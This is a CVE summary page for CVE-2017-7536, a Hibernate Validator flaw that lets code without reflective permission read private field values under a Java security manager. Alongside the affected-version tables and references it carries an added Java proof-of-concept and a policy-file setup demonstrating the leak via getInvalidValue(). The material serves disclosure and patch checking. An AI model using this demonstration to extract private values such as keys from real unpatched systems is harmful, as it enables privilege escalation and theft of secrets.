CVE-2017-7536
Summary
| CVE | CVE-2017-7536 |
|---|---|
| State | PUBLIC |
| Assigner | [email protected] |
| Source Priority | CVE Program / NVD first with legacy fallback |
| Published | 2018-01-10 15:29:00 UTC |
| Updated | 2023-11-07 02:50:00 UTC |
| Description | In Hibernate Validator 5.2.x before 5.2.5 final, 5.3.x, and 5.4.x, it was found that when the security manager's reflective permissions, which allow it to access the private members of a class, are granted to Hibernate Validator, a potential privilege escalation can occur. Because the calling code is allowed to reach those private members without holding the permission itself, an attacker may be able to validate an invalid instance and read the private member value via ConstraintViolation#getInvalidValue(). |
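The description above is the whole mechanism: the validator reads a constrained private field reflectively on the caller's behalf, and the field's value comes back to the caller inside the ConstraintViolation. The following Java program is an added example, not code from the advisory or from the Hibernate Validator project. It assumes an affected 5.x release of hibernate-validator (javax.validation API, with its javax.el dependency) on the classpath, a constructed class ServiceCredentials with a private apiKey field, and a policy file that grants java.lang.reflect.ReflectPermission "suppressAccessChecks" to the hibernate-validator jar but not to the code base containing this class; all of those names and values are assumptions for illustration.

```java
// Added example for CVE-2017-7536 (not from the advisory or the Hibernate Validator project).
// Assumptions: an affected hibernate-validator 5.x release on the classpath, and a policy
// that grants ReflectPermission "suppressAccessChecks" to that jar but not to this class.
import java.lang.reflect.Field;
import java.util.Set;

import javax.validation.ConstraintViolation;
import javax.validation.Validation;
import javax.validation.Validator;
import javax.validation.constraints.Size;

public class Cve20177536Demo {

    /** Constructed holder whose private field carries a bean-validation constraint. */
    public static final class ServiceCredentials {
        // Field-level constraint: the validator must read this field reflectively.
        @Size(min = 32, message = "API key too short")
        private final String apiKey;

        public ServiceCredentials(String apiKey) {
            this.apiKey = apiKey;
        }
        // No getter on purpose: the class intends apiKey to stay private.
    }

    /** Direct reflective read. Under a security manager this needs suppressAccessChecks. */
    static String readDirectly(ServiceCredentials c) throws Exception {
        Field f = ServiceCredentials.class.getDeclaredField("apiKey");
        f.setAccessible(true); // throws SecurityException when the caller lacks the permission
        return (String) f.get(c);
    }

    /** Indirect read through the validator: the caller itself never needs the permission. */
    static String readViaValidator(ServiceCredentials c) {
        Validator validator = Validation.buildDefaultValidatorFactory().getValidator();
        Set<ConstraintViolation<ServiceCredentials>> violations = validator.validate(c);
        for (ConstraintViolation<ServiceCredentials> v : violations) {
            // Path.toString() is "apiKey" for a field-level constraint on that field.
            if ("apiKey".equals(v.getPropertyPath().toString())) {
                return String.valueOf(v.getInvalidValue());
            }
        }
        return null; // a valid instance yields no violation, so nothing is reported back
    }

    public static void main(String[] args) {
        // Constructed sample value, deliberately shorter than @Size(min = 32)
        // so that validation fails and a ConstraintViolation is produced.
        ServiceCredentials c = new ServiceCredentials("hunter2-not-32-chars");

        try {
            System.out.println("direct read: " + readDirectly(c));
        } catch (SecurityException e) {
            System.out.println("direct read denied by security manager: " + e.getMessage());
        } catch (Exception e) {
            throw new RuntimeException(e);
        }

        // On an affected release this prints the private value even though the direct
        // read above was denied. On 5.2.5.Final, the fixed 5.2.x release named in the
        // advisory, this path no longer hands the value to an unprivileged caller.
        System.out.println("via getInvalidValue(): " + readViaValidator(c));
    }
}
```

To reproduce the privilege difference, run with `-Djava.security.manager -Djava.security.policy=demo.policy` (a deprecated but still functional mechanism on current JDKs) where demo.policy contains a `grant codeBase "file:/path/to/hibernate-validator.jar" { permission java.lang.reflect.ReflectPermission "suppressAccessChecks"; };` clause and no such grant for the directory holding Cve20177536Demo; the path and file name are placeholders, and a real policy would also need the additional permissions Hibernate Validator requires to load its configuration and providers. The practical check is the dependency version: anything in the branches listed in the description is affected regardless of how the application itself is written, because the leak happens inside the library's own privileged code path.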
Risk And Classification
Problem Types: CWE-470 (Use of Externally-Controlled Input to Select Classes or Code, "Unsafe Reflection")
NVD Known Affected Configurations (CPE 2.3)
| Type | Vendor | Product | Version | Update | Edition | Language |
|---|---|---|---|---|---|---|
| Operating System | Redhat | Enterprise Linux | 5.0 | All | All | All |
| Operating System | Redhat | Enterprise Linux | 6.0 | All | All | All |
| Operating System | Redhat | Enterprise Linux | 7.0 | All | All | All |
| Application | Redhat | Hibernate Validator | 5.2.x before 5.2.5, 5.3.x, 5.4.x (three NVD range entries; bounds as stated in Description) | All | All | All |
| Application | Redhat | Jboss Enterprise Application Platform | 6.0.0 | All | All | All |
| Application | Redhat | Jboss Enterprise Application Platform | 6.4.0 | All | All | All |
| Application | Redhat | Jboss Enterprise Application Platform | 7.0 | All | All | All |
| Application | Redhat | Jboss Enterprise Application Platform | 7.1 | All | All | All |
| Application | Redhat | Satellite | 6.4 | All | All | All |
| Application | Redhat | Satellite Capsule | 6.4 | All | All | All |
| Application | Redhat | Virtualization | 4.0 | All | All | All |
| Application | Redhat | Virtualization Host | 4.0 | All | All | All |
References
| Reference | Source | Link | Tags |
|---|---|---|---|
| Red Hat Customer Portal | REDHAT | access.redhat.com | Vendor Advisory |
| Red Hat Customer Portal | REDHAT | access.redhat.com | |
| Red Hat Customer Portal | REDHAT | access.redhat.com | |
| Red Hat Customer Portal | REDHAT | access.redhat.com | |
| Pony Mail! | MLIST | lists.apache.org | |
| Red Hat Customer Portal | REDHAT | access.redhat.com | Vendor Advisory |
| Red Hat Customer Portal | REDHAT | access.redhat.com | |
| SecurityFocus BID entry (page title not retrievable) | BID | www.securityfocus.com | Third Party Advisory, VDB Entry |
| Red Hat Customer Portal | REDHAT | access.redhat.com | |
| Red Hat Customer Portal | REDHAT | access.redhat.com | Vendor Advisory |
| Red Hat Customer Portal | REDHAT | access.redhat.com | Vendor Advisory |
| Red Hat Customer Portal | REDHAT | access.redhat.com | Vendor Advisory |
| Red Hat Customer Portal | REDHAT | access.redhat.com | Vendor Advisory |
| Red Hat Customer Portal | REDHAT | access.redhat.com | |
| Red Hat Customer Portal | REDHAT | access.redhat.com | Vendor Advisory |
| Pony Mail! | MLIST | lists.apache.org | |
| Red Hat Customer Portal | REDHAT | access.redhat.com | Vendor Advisory |
| Red Hat Enterprise Virtualization Multiple Flaws Let Remote Users Execute Arbitrary Code and Local Users Determine Passwords and Gain Elevated Privileges - SecurityTracker | SECTRACK | www.securitytracker.com | Third Party Advisory, VDB Entry |
| Red Hat Customer Portal | REDHAT | access.redhat.com | Vendor Advisory |
| 1465573 – (CVE-2017-7536) CVE-2017-7536 hibernate-validator: Privilege escalation when running under the security manager | CONFIRM | bugzilla.redhat.com | Issue Tracking, Vendor Advisory |
| CVE Program record | CVE.ORG | www.cve.org | canonical |
| NVD vulnerability detail | NVD | nvd.nist.gov | canonical, analysis |
No vendor comments have been submitted for this CVE.
Legacy QID Mappings
- 982289 Java (maven) Security Update for org.hibernate:hibernate-validator (GHSA-xxgp-pcfc-3vgc)